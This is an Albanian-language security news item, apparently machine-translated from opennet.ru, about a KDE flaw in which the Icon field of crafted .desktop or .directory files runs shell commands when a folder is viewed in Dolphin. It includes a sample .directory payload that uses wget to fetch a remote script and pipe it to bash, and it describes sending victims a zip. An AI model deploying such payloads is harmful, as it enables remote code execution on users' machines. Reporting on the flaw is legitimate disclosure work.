Në KDE , e cila lejon sulmuesit të kryejnë komanda të rastësishme kur përdoruesi shikon një dosje ose arkiv, që përmban skedarë të veçantë të dizajnuar " .desktop " dhe " .directory ". Për sulmin, mjafton që përdoruesi të shikojë listën e skedarëve në menaxherin e skedarëve Dolphin, të ngarkojë një skedar desktop të dëmshëm ose të tërheqë ikonen në desktop ose në një dokument. Problemi shfaqet në versionin aktual të bibliotekave dhe versionet më të vjetra, deri në KDE 4. Vulnerabiliteti aktualisht (CVE nuk është atribuuar).
Problemi shkaktohet nga implementimi i papërshtatshëm i klasës KDesktopFile, e cila, gjatë përpunimit të variablës " Icon ", pa e përgatitur siç duhet, dërgon vlerën në funksionin KConfigPrivate::expandString(), i cili realizon shpërbërjen e simboleve speciale të shell, përfshirë duke përpunuar vargjet " $(..)" si komanda që duhet ekzekutuar. Pavarësisht kërkesave të specifikimit XDG, ekzekutimi e konstruksioneve shell bëhet pa ndarjen e llojit të konfigurimeve, pra jo vetëm gjatë përcaktimit të komandës që do të ekzekutohet, por gjithashtu kur përcaktohet ikonat e shfaqura si të parazgjedhura.
Për shembull, për sulmin dërgo përdoruesit një arkiv zip me një katalog që përmban skedarin «.directory» të llojit:
[Desktop Entry]
Lloji=Katalog
Ikona[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Kur përpiqeni të shihni përmbajtjen e arkivit në menaxherin e skedarëve Dolphin, skripti https://example.com/FILENAME.sh do të shkarkohet dhe ekzekutohet.

Burimi: opennet.ru
